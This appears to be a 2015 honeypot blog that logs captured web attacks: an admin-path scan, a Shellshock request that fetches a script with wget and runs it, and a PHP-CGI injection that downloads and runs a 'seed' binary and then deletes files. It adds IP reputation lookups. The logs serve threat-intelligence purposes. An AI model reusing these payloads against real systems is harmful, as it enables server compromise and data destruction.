Sonntag, 29. November 2015

46.105.8.133 - Scanning host via Python-urllib

BEGIN OF HTTP DATA:
2015-11-29 11:01:38
Source IP: 46.105.8.133
GET / HTTP/1.1
Accept-Encoding: identity
Host: 109.234.106.8:8080
Connection: close
User-Agent: Python-urllib/2.7


 END OF DATA
GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1
GET / HTTP/1.1
GET /script HTTP/1.1
GET /jenkins/script HTTP/1.1
GET /hudson/script HTTP/1.1
GET /login HTTP/1.1
GET /jenkins/login HTTP/1.1
GET /hudson/login HTTP/1.1
GET /jmx-console HTTP/1.1
GET / HTTP/1.1
GET / HTTP/1.1
GET /manager/html HTTP/1.1
GET / HTTP/1.1
GET / HTTP/1.1
GET /msd HTTP/1.1
GET /mySqlDumper HTTP/1.1
GET /msd1.24stable HTTP/1.1
GET /msd1.24.4 HTTP/1.1
GET /mysqldumper HTTP/1.1
GET /MySQLDumper HTTP/1.1
GET /mysql HTTP/1.1
GET /sql HTTP/1.1
GET /phpmyadmin HTTP/1.1
GET /phpMyAdmin HTTP/1.1
GET /mysql HTTP/1.1
GET /sql HTTP/1.1
GET /myadmin HTTP/1.1
GET /phpMyAdmin-4.2.1-all-languages HTTP/1.1
GET /phpMyAdmin-4.2.1-english HTTP/1.1
GET / HTTP/1.1
GET /sqlite/main.php HTTP/1.1
GET /SQLite/SQLiteManager-1.2.4/main.php HTTP/1.1
GET /SQLiteManager-1.2.4/main.php HTTP/1.1
GET /sqlitemanager/main.php HTTP/1.1
GET /SQlite/main.php HTTP/1.1
GET /SQLiteManager/main.php HTTP/1.1

46.105.8[.]133

    Static Source: GeoIP data
  • Country: France
  • ASN: AS16276 OVH SAS
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/46.105.8.133
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

31.16.134.211 - Shellshock via http://qupn.byethost5.com

BEGIN OF HTTP DATA:
2015-11-28 17:55:32
Source IP: 31.16.134.211
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://qupn.byethost5.com/gH/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1
 -t500
 END OF DATA
At the time of my analyse the accessiable site only showed a HTML side related to Goolgeaddsense.

31.16.134[.]211

    Static Source: GeoIP data
  • Country: Germany
  • ASN: AS31334 Kabel Deutschland Vertrieb und Service GmbH
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/31.16.134.211

Page:
<!DOCTYPE html>
<!--[if IE 8 ]><html class="ie8"><![endif]--><!--[if IE 9 ]><html class="ie9"><![endif]--><!--[if (gt IE 9)|!(IE)]><!--><html><!--<![endif]-->
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <title></title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <noscript><meta HTTP-EQUIV="REFRESH" content="0; url=/legacy"></noscript>
  <script src="//www.google.com/adsense/domains/caf.js" type="text/javascript"></script>
</head>
<body>
<script type="text/javascript">et=(function(){var
eD=window.location,eH={},dG,ej=eD.search.substring(1),eF,eG;if(!ej)
return eH;eF=ej.split("&");for(dG=0;dG<eF.length;dG++){eG=eF[dG].split('=');eH[eG[0]]=eG[1]?eG[1]:"";}
return eH;})();(function(){var
eD=window.location,X=document,cC=undefined,bd=encodeURIComponent,dA=X.getElementsByTagName('body')[0],eE;if(top.location!=eD)
top.location.href=eD.href;eE=X.createElement('script');eE.type='text/javascript';eE.src='/glp'+'?r='+(et.r?et.r:(X.referrer?bd(X.referrer.substr(0,255)):''))+'&u='+bd(eD.href.split('?')[0])+
(et.gc?'&gc='+et.gc:'')+
(et.cid?'&cid='+et.cid:'')+
(et.query?'&sq='+et.query:'')+
(et.a!==cC?'&a':'')+
(et.z!==cC?'&z':'')+
(et.z_ds!==cC?'&z_ds':'');dA.appendChild(eE);if(!window['googleNDT_'])
eD.replace('/legacy');})();</script>
</body>
</html>
 

Sonntag, 1. November 2015

5.39.251.4 - Backdoor.Perl.Shellbot.fj via trying.us.to (195.182.136.198)

BEGIN OF HTTP DATA:
2015-10-31 10:54:30
Source IP: 5.39.251.4
Country: GB RiskScore: 1 Malware: []
POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
Host: -h
Content-Type: application/x-www-form-urlencoded
Content-Length: 188

<? system("cd /tmp ; wget trying.us.to/seed.jpg ; curl -O http://trying.us.to/seed.jpg ; fetch http://trying.us.to/seed.jpg ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed  ; rm -rf * "); ?>
 END OF DATA
We have handled this sort of attack already in a previous blog post. The attack has not been seen since March.

195.182.136[.]198

    Static Source: GeoIP data
    Country: Russian Federation
    ASN: AS6858 Comlink Ltd

    Dynamic Source: IBM X-Force Exchange
    Score: 1.4
    Reference: https://exchange.xforce.ibmcloud.com/ip/195.182.136.198

    Dynamic Source: SANS Internet Storm Cast
    comment:IP is listed on SANS ISC
    comment:This entry alone does not indicate a threat, please check the link
    Reference: https://isc.sans.edu/api/ip/195.182.136.198

Feed search for 195.182.136[.]198
5.39.251[.]4

    Static Source: GeoIP data
    Country: United Kingdom
    ASN: AS30938 ahbr company limited

    Dynamic Source: SANS Internet Storm Cast
    comment:IP is listed on SANS ISC
    comment:This entry alone does not indicate a threat, please check the link
    Reference: https://isc.sans.edu/api/ip/5.39.251.4

Feed search for 5.39.251[.]4